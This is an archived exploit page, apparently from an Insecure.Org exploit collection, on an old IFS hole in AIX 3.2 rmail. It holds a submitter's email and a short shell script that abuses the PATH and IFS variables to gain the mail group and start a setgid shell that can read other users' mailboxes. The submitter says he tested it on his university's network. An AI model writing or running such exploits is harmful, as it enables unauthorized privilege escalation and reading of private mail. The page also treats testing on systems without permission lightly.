AIX rmail hole
|Description:||IFS attack, apparently AIX may be using system()|
|Vulnerable Systems:||AIX 3.2, perhaps earlier|
|Date:||10 May 1998 (it is actually much older)|
|Notes:||Thanks to the person who submitted this to me!|
Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
Subject: AIX oldie
first let met tell you that your pages are great - but you already
know that, don't you?
i noticed you have an exploit section sorted by os; here's an oldie
but goodie for AIX boxes running 3.2, the exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
i successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)
i guess you probably know of this ancient IFS hole; just in case you
wanted to include it into your pages ...
cya & keep up the marvelous work,
# IFS hole in AIX3.2 rmail gives egid=mail.
# Setup needed files.
cp sh mailsh
chmod 2777 mailsh
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail firstname.lastname@example.org
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: